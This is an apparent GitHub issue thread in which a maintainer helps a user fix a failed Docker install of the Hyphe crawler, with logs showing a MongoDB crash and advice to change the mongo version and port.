frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:46 +0000] "GET /phpmy-admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:46 [error] 20#20: *274 open() "/frontend/app/pma2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:46 +0000] "GET /pma2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:47 [error] 20#20: *275 open() "/frontend/app/mysql/sqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:47 +0000] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:08:58 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-"
backend_1   | /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
backend_1   |   from cryptography import utils, x509
backend_1   | ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json
hyphe_backend_1 exited with code 0
boogheta commented 3 years ago

The problem comes from the very beginning "hyphe_mongo_1 exited with code 139". This is indeed a common problem under Windows which I forgot about. A solution that should work would be that you open the docker-compose.yml file in a text editor and change the line "mongo:3.0" into "mongo:3.2" then retry.

Also looking at your logs, it seems like you already have many web services running on your machine, so you should setup hyphe on a different port to isolate it. To do so, edit your .env file and change the line PORT=80 into for instance PORT=8009 before retrying

ying5207 commented 3 years ago

The problem comes from the very beginning "hyphe_mongo_1 exited with code 139". This is indeed a common problem under Windows which I forgot about. A solution that should work would be that you open the docker-compose.yml file in a text editor and change the line "mongo:3.0" into "mongo:3.2" then retry.

Also looking at your logs, it seems like you already have many web services running on your machine, so you should setup hyphe on a different port to isolate it. To do so, edit your .env file and change the line PORT=80 into for instance PORT=8009 before retrying

Install successfully. Thanks so much for your help and patient, much appreciated! Hyphe is superb :)

boogheta commented 3 years ago

\o/